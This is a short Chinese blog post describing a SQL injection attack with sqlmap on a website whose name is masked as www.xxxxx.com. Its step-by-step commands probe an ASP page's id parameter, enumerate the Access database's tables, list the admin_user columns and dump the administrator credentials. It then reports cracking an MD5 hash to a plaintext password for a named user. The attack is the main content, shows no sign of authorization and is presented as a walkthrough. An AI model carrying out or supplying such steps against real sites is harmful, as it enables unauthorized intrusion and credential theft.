sqlmap手动注入某网站

http://www.xxxxx.com/common.asp?id=1

通过url分析可以猜出使用的是access数据库

cmd 中 python sqlmap.py -u http://www.xxxxx.com/common.asp?id=1 检查网站是否存在可注入点。


通过返回可发现数据库使用的是access

python sqlmap.py -u http://www.xxxxx.com/common.asp?id=1 --tables 检查access数据库中的表

得到以上几个库,可以猜测admin_user中存放我们所需要的

python sqlmap.py -u http://www.xxxxx.com/common.asp?id=1 --columns -T admin_user 查表中的字段


python sqlmap.py -u http://www.xxxxx.com/common.asp?id=1 --dump -T admin_user "admin,password" 查字段中的数据



得到登录名LYL passwd 明显MD5加密,解密后的到xkluo168

你可能感兴趣的:(sqlmap手动注入某网站)